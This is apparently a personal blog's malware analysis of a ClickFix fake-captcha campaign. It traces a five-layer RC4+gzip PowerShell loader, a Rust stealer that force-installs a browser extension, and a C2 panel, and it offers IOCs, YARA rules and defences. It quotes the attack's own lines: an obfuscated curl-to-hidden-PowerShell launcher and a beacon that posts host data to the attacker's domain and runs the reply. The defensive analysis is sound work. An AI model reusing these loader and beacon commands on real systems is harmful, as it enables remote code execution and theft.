Fake captcha, five layers of RC4, and a Rust stealer with LSA session enumeration and AD recon

The views and opinions expressed in this post are my own and do not represent those of my employer. This is a personal blog where I share research and things I’m learning.

TL;DR

ClickFix campaign delivering a five-layer RC4+gzip PowerShell loader from captcha-code[.]lol. Final payloads: an 8 MB Rust infostealer that force-installs a malicious browser extension across six browsers, enumerates every LSA logon session, and performs full AD user/group recon via NetAPI; and a custom PIC shellcode loader with a runtime-encrypted inner payload (family not recovered statically). C2: 94.154.32[.]21:8080 (Rust stealer), 87.232.123[.]174:80 (shellcode branch). C2 panel named Lunex, bilingual EN/RU.

If this is your fleet, do these first:

• Enable PowerShell Script Block Logging (Event ID 4104) and alert on the RC4 PRGA string -bxor $S[($S[$i]+$S[$j])%256]
• Audit browser extensions on all endpoints – compare against an approved baseline; anything added outside a deployment window is suspicious
• Hunt Run key: HKCU\...\CurrentVersion\Run value ibrowser
• Block: captcha-code[.]lol, ziemaen[.]lol, 94.154.32[.]21:8080, 87.232.123[.]174:80

Full IOC table and YARA rules at the bottom of this post.

So someone pasted a command they shouldn’t have

A Defender alert fires on a host. The user says they were trying to verify a captcha. You pull the process tree and find cmd.exe spawning curl.exe which pipes into a hidden powershell.exe, which then downloads five more scripts before reaching into the registry and dropping two payloads.

That’s ClickFix – and this one had more going on than it first appeared: a Rust stealer that force-installs a malicious browser extension (bypassing Chrome’s Secure Preferences HMAC protection), enumerates every active Windows logon session via LSA APIs, and performs full Active Directory user and group recon. There was also a fully bilingual Russian/English C2 panel with live remote browser control on port 8000, surface visible via OSINT.

This post walks through how I peeled the whole chain statically, what the payloads actually do, and – most importantly – what you can do to stop the next one.

The attack at a glance

1. Lure           captcha-code[.]lol -> fake captcha -> user pastes command
2. Launcher       cmd /v:on /k -> wildcard obfuscation -> curl | powershell -w hidden
3. Staging        Five nested RC4+gzip layers, each IEX'd in memory (main.ps1)
4. Recon          50-tool sandbox check; host fingerprint beacon to /m
5. Routing        WORKGROUP tag (ABCD111) vs domain tag (BCDA222) -> different payload
6. Payload A      Rust infostealer update.exe: force extension, LSA session enum, AD recon, persist
7. Payload B      data.bin: custom PIC shellcode loader, inner payload runtime-encrypted

Two different final payloads, same infrastructure, operator picks based on whether you’re a consumer or a corporate target.

How it works

The launcher: obfuscating the obvious

The pasted command is ugly on purpose:

cmd /v:on /k "set x=where c*u*r*l.e?e&set y=where p*ell.exe&for /f %i in ('where c*d.e?e')do %i /c "for /f %k in ('!x!')do %k https://captcha-code[.]lol/o|for /f %j in ('!y!')do %j -WindowStyle Hidden""

Stripped of the noise, it’s just:

curl https://captcha-code[.]lol/o | powershell -WindowStyle Hidden

The where c*u*r*l.e?e wildcard trick resolves curl.exe at runtime, bypassing simple string detection. The cmd /v:on enables delayed variable expansion so !x! and !y! expand inside the inner shell. It’s a neat little sidestep – and increasingly common in ClickFix campaigns. Using curl.exe to pull the first-stage payload is a living-off-the-land technique – the binary ships with Windows, is trusted by most AV, and sidesteps rules that scan for known-bad executables.

Five layers of RC4 + gzip: Russian dolls

The downloaded main.ps1 looks intimidating but follows a pattern. Each layer is the same wrapper:

• A long Base64 string (the next payload)
• A [byte[]]@(...) array (the RC4 key)
• An inline RC4 routine
• GZip decompression
• Invoke-Expression – written as 'I'+'nv'+'ok'+'e-E'+'xpr'+'ess'+'ion' to avoid string matching

Each decoded layer contains the same structure, one level deeper. Five times. The whole thing peels in about 20 lines of Python – RC4 is fast to implement and fast to reverse.

import re, base64, gzip

def rc4(data, key):
    S = list(range(256)); j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0; out = bytearray()
    for b in data:
        i = (i + 1) % 256; j = (j + S[i]) % 256; S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

ps = open("main.ps1").read()
while True:
    blob = max(re.findall(r'"([A-Za-z0-9+/=]{200,})"', ps), key=len, default=None)
    keym = re.search(r'\[byte\[\]\]@\(([\d,\s]+)\)', ps)
    if not blob or not keym: break
    key  = bytes(int(x) for x in keym.group(1).split(','))
    dec  = rc4(base64.b64decode(blob), key)
    ps   = gzip.decompress(dec).decode('utf-8', 'replace')
    if '[byte[]]@(' not in ps: break

The RC4 output starts 1f 8b each layer – the gzip magic bytes – which is a nice validation that you’ve got the right key.

Anti-analysis: 50 tools, one exit

The final decoded stage checks for ~50 running processes before doing anything:

$aoy = @('wireshark','x64dbg','ghidra','ida','processhacker','procmon','sysmon',
         'fiddler','sandboxie','vmware','virtualbox','qemu-ga','prl_cc', ...)
Get-Process | ForEach-Object {
    foreach ($t in $aoy) { if ($_.Name.ToLower() -like "*$t*") { exit } }
}

The list includes qemu-ga (QEMU guest agent) and prl_cc (Parallels Tools) – this isn’t a generic list, someone maintains it. The tool names themselves are obfuscated in the script via single-byte XOR and Base64; I decoded them statically with Python.

The beacon: the operator knows where you work

After the sandbox check, the script reads your domain membership and AV products:

$domain = (Get-CimInstance Win32_ComputerSystem).Domain
if ($domain -eq 'WORKGROUP') {
    # tag: ABCD111 -- consumer
    iwr 'https://captcha-code[.]lol/m' -Method POST -Body @{message="ABCD111`n<AV>"} | iex
} else {
    # tag: BCDA222 -- domain-joined corporate victim
    $dcCount = (net group "Domain Computers" /domain | Select-String '\$').Count * 3
    iwr 'https://captcha-code[.]lol/m' -Body @{message="BCDA222`nAV: $av`n| $domain |`nAD: $dcCount"} | iex
}

The response to that POST is piped straight to iex – the server decides what you get based on which tag you sent. Domain-joined victims also hand over a rough domain computer count before receiving their payload. I sent fabricated data to the /m endpoint; the domain branch returned a 520 error (operator’s origin was down), so the enterprise payload isn’t in this report.

The Rust infostealer: update.exe

The workgroup branch eventually drops an 8 MB Rust binary. It targets six browsers – Chrome, Edge, Opera, Brave, Vivaldi, and Arc – and goes after passwords, cookies, autofill data, and credit cards.

Browser credential collection – extension-based, not DPAPI. Instead of decrypting cookies from disk, the stealer installs a malicious browser extension across all six browsers. The install path:

1. Finds all Chrome/Edge/Opera/Brave/Vivaldi/Arc profile directories (all six path patterns are hardcoded in one string)
2. Tampers with Secure Preferences for each profile: enables developer mode (so unsigned extensions load), adds the attacker’s extension to the approved list
3. Bypasses the developer_mode_encrypted_hash guard – a salted hash Chrome 45+ introduced specifically to detect developer mode tampering
4. Re-computes the protectionmacs/super_mac HMAC fields using the hmac-sha256 crate so Chrome accepts the modified file
5. Drops and activates the extension

Once that extension is running inside the browser’s own process, it calls chrome.cookies and gets cookies in cleartext – the browser hands them over because it trusts the extension. No DPAPI. Chrome’s disk-level cookie encryption is entirely bypassed because the extension never touches the encrypted file. A successful install is confirmed in the binary by the literal string "Successfully installed extension in N profile(s)".

The C2 panel can then push JavaScript to inject into specific websites, redirect domains, capture screenshots, and give the operator live remote browser control via WebSocket.

LSA session enumeration. The import table reveals three functions from secur32.dll: LsaEnumerateLogonSessions, LsaGetLogonSessionData, and LsaFreeReturnBuffer. These are direct Windows API calls, not string-table noise. Together they enumerate every active logon session on the host and retrieve per-session credential metadata – this is the same mechanism used by credential-dumping tools like Mimikatz’s sekurlsa::logonsessions. The binary also imports OpenProcessToken and GetTokenInformation from advapi32.dll for privilege checking. This is a significant capability that was not apparent from the browser-extension focus: the stealer may be harvesting session tokens from all authenticated users on the machine, not just the one running the browser.

Active Directory enumeration. Five functions from netapi32.dll appear in the import table: NetUserEnum, NetUserGetInfo, NetUserGetLocalGroups, NetGroupEnum, and NetGroupGetInfo. This gives the stealer a full-fidelity map of domain users, their group memberships, and local group assignments – standard AD reconnaissance. Whether the operator uses this data to target lateral movement or simply to profile the environment isn’t clear, but the capability is there.

AV enumeration via hidden PowerShell. The binary spawns a fully hidden PowerShell subprocess to query installed AV products:

powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command
  Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct |
  Select-Object -ExpandProperty displayName

The binary also calls CoCreateInstance, CoSetProxyBlanket, and CoInitializeSecurity for direct WMI COM access, so WMI queries extend beyond just AV enumeration.

The embedded config gives away the C2:

{
  "api_url": "http://94.154.32[.]21:8080",
  "api_key": "eeb547f4dd3ba851526e1e3c6d1ae7a5256b46d988bf40710c731a107d670550",
  "auto_install": true,
  "telegram_enabled": false
}

The Telegram token is empty here – provisioned per-victim from the C2 at check-in, so the operator can redirect exfil to any bot without recompiling. The build path in the binary leaks /Users/chapter/.cargo/registry/ – username chapter is a useful cross-sample correlation pivot.

The C2 panel: Lunex

Port 8000 on the same server hosts a React SPA named Lunex – a bilingual English/Russian C2 panel (over 100 natively-authored Russian UI strings, listed language options are English and Русский). OSINT on the C2 infrastructure gave a clear picture of the panel’s capabilities. From the compiled JS bundle I extracted the full operator command set: arbitrary JavaScript injects into URL-matched pages, domain spoofing/substitution, live WebSocket remote browser control, screenshots, tab snapshots, push notifications. The extension is the delivery mechanism for all of it.

The panel was created 2026-06-04. ziemaen[.]lol (the EXE drop domain) was registered the next day. The victim was hit on 2026-06-10. Six days from infrastructure setup to active campaign.

Techniques observed (MITRE ATT&CK)

The following techniques have been mapped to MITRE ATT&CK for future reference.

Tactic	Technique	ATT&CK ID	What it did
Initial Access	User Execution: Malicious Link	T1204.002	ClickFix fake captcha
Defense Evasion	Obfuscated Files / Deobfuscate	T1027 / T1140	Wildcard cmd, RC4+gzip, concat IEX
Defense Evasion	Sandbox/VM evasion	T1497.001	50-tool process check
Discovery	System Info / Domain Trust	T1082 / T1018	Domain, AV, DC count
Discovery	Domain Account enumeration	T1087.002	NetUserEnum/NetGroupEnum AD recon
Discovery	Software Discovery: Security Software	T1518.001	Hidden PowerShell -> AntiVirusProduct WMI query
Command & Control	Web protocols	T1071.001	POST beacon -> iex response
Execution	Reflective code loading	T1620	$shellcodeDelegate.Invoke()
Execution	Native API	T1106	LSA session enumeration via LsaEnumerateLogonSessions
Credential Access	Credentials from browsers	T1555.003	Malicious extension harvests cookies via browser APIs
Credential Access	OS Credential Dumping: LSA Secrets	T1003.004	LsaEnumerateLogonSessions/LsaGetLogonSessionData on all active sessions
Persistence	Browser extensions	T1176	Secure Preferences HMAC tamper
Persistence	Registry Run keys	T1547.001	ibrowser value
Exfiltration	Exfil over web / Telegram	T1041 / T1567.002	C2 HTTP + Telegram bot

Why this matters

The LSA session enumeration is the thing I’d flag hardest. LsaEnumerateLogonSessions + LsaGetLogonSessionData hit every active logon session on the machine – not just the current user’s browser. If a service account, a domain admin, or a shared terminal session is logged in, the stealer can see it. Combined with the AD user and group enumeration via NetAPI, the operator gets both a live session inventory and a full map of domain accounts and their group memberships. That’s reconnaissance infrastructure, not just a cookie stealer.

The browser extension adds a second dimension: even after you’ve cleaned the EXE, the extension might still be running in the browser, injecting JavaScript into pages and streaming data back. Any browser session on that host – banking, corporate SSO, email – should be considered compromised until the extension is verified removed.

The domain-gating means if you’re on a corporate network, you might be getting a heavier payload than what I captured here – the consumer branch (this sample) already has AD enumeration built in; the enterprise branch payload is still unknown.

I’m not going to speculate on who’s behind this. The Russian-language panel, Ukrainian hosting, and tight operational timeline are interesting data points, but they’re not attribution – they’re clustering signals.

What defenders can do

Technique (ATT&CK)	What to do	Essential Eight	What to hunt for
ClickFix paste-and-run (T1204.002)	Application Control prevents the piped script from executing; User App Hardening blocks cmd /v:on in non-admin contexts	Application Control (L1+); User Application Hardening	4688: cmd.exe spawning curl.exe then powershell.exe; any powershell -w h with stdin from pipe
RC4+gzip PS loader (T1027/T1140)	PowerShell Constrained Language Mode disables the [byte[]], [Convert], and inline-class constructs the loader depends on	Application Control	4104 Script Block Logging: RC4 PRGA loop or IO.Compression.GzipStream in a script
Browser extension force-install (T1176)	Chrome enterprise policy ExtensionInstallAllowlist; baseline approved extension IDs and alert on additions; User App Hardening for browser configuration	Application Control; User Application Hardening	New files under %LOCALAPPDATA%\...\Extensions\; Secure Preferences write outside a Chrome process; Chrome developer mode warnings appearing without user action
LSA session enumeration (T1003.004 / T1106)	Enable LSA Protection (RunAsPPL) to block non-PPL processes from calling LSA APIs; Credential Guard prevents cached credential access	Restrict Administrative Privileges; Patch Operating Systems	Sysmon Event ID 10: process access to lsass.exe from non-system processes; Windows Security Event 4624/4634 for unexpected logon session creation
AD user/group enumeration (T1087.002)	Audit LDAP/Kerberos query volume per host; flag endpoints calling NetUserEnum or NetGroupEnum against a DC – workstations don’t normally do this	Restrict Administrative Privileges	Security Event 4661 on directory objects; Sysmon network connections to DC port 389/636/445 from non-DC hosts
Run-key persistence (T1547.001)	Application Control still blocks the payload; baseline HKCU\...\Run and alert on new values	Restrict Administrative Privileges; Application Control	Sysmon Event ID 13 (registry value set) on CurrentVersion\Run; specifically value name ibrowser

ClickFix and the loader chain. The most effective control is also the broadest: Application Control. If powershell.exe can’t run arbitrary downloaded scripts, the entire RC4+gzip chain stalls at the first layer. See Implementing Application Control (ASD/ACSC, November 2023) for the per-level requirements. The immediate detection is PowerShell Script Block Logging – Event ID 4104 records the decoded script body regardless of how it was encoded on disk. If you’re not already capturing 4104, this investigation is a good reason to start. The RC4 PRGA string (-bxor $S[($S[$i] + $S[$j]) % 256]) is distinctive enough to alert on directly.

The browser extension force-install. The stealer doesn’t need to touch Chrome’s cookie encryption at all – it installs an extension that runs inside the browser and gets cookies in cleartext via the browser’s own APIs. Chrome’s enterprise policy ExtensionInstallAllowlist and ExtensionInstallBlocklist are the controls here. If you manage a fleet, maintaining a list of approved extension IDs and alerting on anything outside it is the detection. Chrome will also display a developer mode warning when unpacked extensions are loaded – if users are seeing that banner without having installed anything, that’s your signal. This is also the persistence mechanism that survives a simple file-cleanup: if a host ran this stealer, checking browser extensions isn’t optional. See Hardening Microsoft Windows 11 Workstations (ASD/ACSC, September 2025) for the browser hardening guidance, and Application Control to prevent the binary from running in the first place.

LSA session enumeration. The binary calls LsaEnumerateLogonSessions and LsaGetLogonSessionData directly – no lsass.exe memory read required, just an API call. The defensive controls are LSA Protection (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1), which prevents non-PPL processes from making those calls, and Windows Defender Credential Guard, which protects credential material at a hypervisor level. Detection: Sysmon Event ID 10 capturing process access to lsass.exe, and baselining Windows Security Events 4624/4634 to catch unexpected logon session activity. Any non-system process on a workstation calling into secur32!LsaEnumerateLogonSessions is worth investigating.

Active Directory enumeration via NetAPI. A workstation calling NetUserEnum against a domain controller is unusual – it’s the kind of thing a domain controller or management tool does, not an endpoint. Detection opportunities include Security Event 4661 (handle requested on directory service objects), and monitoring network connections from workstations to DC ports 389/636/445 for high-volume query patterns. If you have LDAP query logging enabled on your DCs (Directory Service audit category), bulk user/group enumeration from non-server hosts will stand out quickly.

The Run key. The ibrowser value in HKCU\...\CurrentVersion\Run is the persistence mechanism for the EXE branch. It’s detectable via registry auditing (Sysmon Event ID 13) and, if you have autoruns baselining in your EDR, it’ll fire there too. This is one of the easiest detections to add if you don’t have it: alert on new values added to CurrentVersion\Run on endpoints, especially outside a software deployment window.

Hunting and detection summary

• Event ID 4104: RC4 PRGA string -bxor $S[($S[$i] + $S[$j]) % 256]; IO.Compression.GzipStream; domain captcha-code[.]lol
• Event ID 4688 / Sysmon 1: cmd.exe -> curl.exe -> powershell.exe (stdin pipe); powershell.exe -> net.exe querying "Domain Computers"; unsigned PE from %TEMP%; powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden spawned by a non-shell parent
• Sysmon 10 (process access): any non-system process opening a handle to lsass.exe – specifically workstations calling into secur32.dll LSA APIs
• Sysmon 13 / Registry: new value ibrowser in HKCU\...\CurrentVersion\Run
• Windows Security 4624/4634: unexpected logon session creation not matching an interactive or service login pattern
• Windows Security 4661 / DC LDAP audit: high-volume NetUserEnum/NetGroupEnum equivalent queries from a workstation source IP
• File: %APPDATA%\Roaming\OFFICE\data.bin; %TEMP%\u.exe; new directories in browser extension paths; Secure Preferences written by a non-browser process
• Network: POST to /api/v1/checkin with JSON containing computer_name, mac_address, is_admin; outbound TCP to 94.154.32[.]21:8080; api.telegram[.]org/bot egress from non-browser processes; outbound to captcha-code[.]lol, ziemaen[.]lol; workstation -> DC port 389/636/445 for high-volume queries
• Beacon tells: HTTP POST body containing literal string ABCD111 or BCDA222

The YARA rules, Sigma detections, KQL queries, and IOC list for this campaign are also available in the companion detection repo.

Indicators of Compromise

Type	Indicator	Notes
Domain	captcha-code[.]lol	ClickFix lure + staging
Domain	ziemaen[.]lol	EXE drop host
IP:port	87.232.123[.]174:80	Flask shellcode C2
IP:port	94.154.32[.]21:8080	Rust stealer C2
Domain	9sxbhphss8kiyk2[.]top	Stage-7 (dead at time of analysis)
Domain	hfpfhy7zytroclo[.]top	Stage-7 (NXDOMAIN at time of analysis)
Domain	v4bdhuudd0n353v[.]top	Stage-7 (dead at time of analysis)
SHA256	ff2f74cc198a07ea7bf4457dd9e5c0e0adc5b073b5e50d4f13d32b753d7be744	main.ps1 stage 1
SHA256	bc25823b5a15b3fd607eba3e716d4bfab05391bc3a73c7603fba5d43ee25deab	wgr.ps1 workgroup stage
SHA256	4dd1f15776d78f82f2ee8dcf661e6d2431d9140e1b5b89b699e06d1e11712cdc	script.ps1 Flask branch stage
SHA256	372df5bac7bce42e403cd024589eec0f76c2b3ed92bd30a5cb34948a0662c2a1	update.exe Rust stealer
SHA256	475a242cdd832aa43b562ffb6abf3fee1e7f0479425b9c00434a4a44b5c60f14	data.bin shellcode (XOR 0x3B encrypted on disk)
File	%APPDATA%\Roaming\OFFICE\data.bin	Shellcode staging path
File	%TEMP%\u.exe	Dropped stealer copy
Registry	HKCU\...\CurrentVersion\Run\ibrowser	Stealer persistence
Campaign GUID	580e250d-effb-401a-b981-fb7fd80635a2	?s= param across all stage-7 URLs
API key	eeb547f4dd3ba851526e1e3c6d1ae7a5256b46d988bf40710c731a107d670550	Hardcoded in stealer binary
Panel	94.154.32[.]21:8000	Lunex C2 panel

Detection rules

rule ClickFix_CaptchaCode_PS_Loader
{
    meta:
        author      = "Luke Wilkinson"
        date        = "2026-06-11"
        description = "ClickFix RC4+GZip PowerShell loader (captcha-code[.]lol)"
    strings:
        $rc4  = "-bxor $S[($S[$i] + $S[$j]) % 256]" ascii
        $gz   = "IO.Compression.GzipStream" ascii
        $iex  = "'I' + 'nv' + 'ok' + 'e-E' + 'xpr' + 'ess' + 'ion'" ascii
        $junk = "Random junk" ascii
        $beac = "captcha-code.lol" ascii
        $tagA = "ABCD111" ascii
        $tagB = "BCDA222" ascii
    condition:
        2 of ($rc4,$gz,$iex,$junk) or $beac or any of ($tagA,$tagB)
}

rule Stealer_Rust_chapter_BrowserExt
{
    meta:
        author      = "Luke Wilkinson"
        date        = "2026-06-11"
        description = "Rust infostealer: extension force-install + LSA enum (captcha-code[.]lol campaign)"
    strings:
        $dev  = "/Users/chapter/.cargo/registry" ascii
        $pref = "src/internal/secureprefs" ascii
        $reg  = "ibrowser" ascii
        $chk  = "/api/v1/checkin" ascii
        $lsa  = "LsaEnumerateLogonSessions" ascii
        $mz   = { 4D 5A }
    condition:
        $mz at 0 and 2 of ($dev,$pref,$reg,$chk,$lsa)
}

Closing

The LSA session enumeration is the part I keep coming back to. A stealer that enumerates every active logon session on the machine – not just the browser user’s session – has a much broader blast radius than the “browser credential stealer” label implies. Combined with full AD user and group enumeration, the operator has everything they need to profile an environment for follow-on access. It doesn’t read as opportunistic; it reads as deliberate capability.

The strongest takeaway from this whole chain is still the one that sounds the most boring: Application Control and PowerShell Constrained Language Mode would have stopped this at layer one, before any of the clever stuff got to run. The Secure Preferences HMAC tamper, the LSA API calls, the NetAPI AD enumeration – none of it matters if the RC4+gzip stager can’t Invoke-Expression its way to the next stage.

Enable Script Block Logging if you haven’t. Baseline your browser extensions. Enable LSA Protection. Keep that autoruns alert ticking.

Stay curious.

---

On methodology: the investigation is mine. The reverse engineering and analysis assembly were carried out with AI workflows (Claude, primarily). I reviewed every finding. Errors are mine - ping me on X or Instagram if you spot something off.

References

• MITRE ATT&CK: T1204.002, T1027, T1140, T1497.001, T1082, T1018, T1087.002, T1518.001, T1071.001, T1620, T1106, T1555.003, T1003.004, T1176, T1547.001, T1041, T1567.002
• Implementing Application Control (ASD/ACSC, November 2023)
• Restricting Administrative Privileges (ASD/ACSC, November 2023)
• Hardening Microsoft Windows 11 Workstations (ASD/ACSC, September 2025)
• ISM Guidelines for System Hardening (ASD/ACSC, June 2025)
• Essential Eight Maturity Model (ASD/ACSC, November 2023)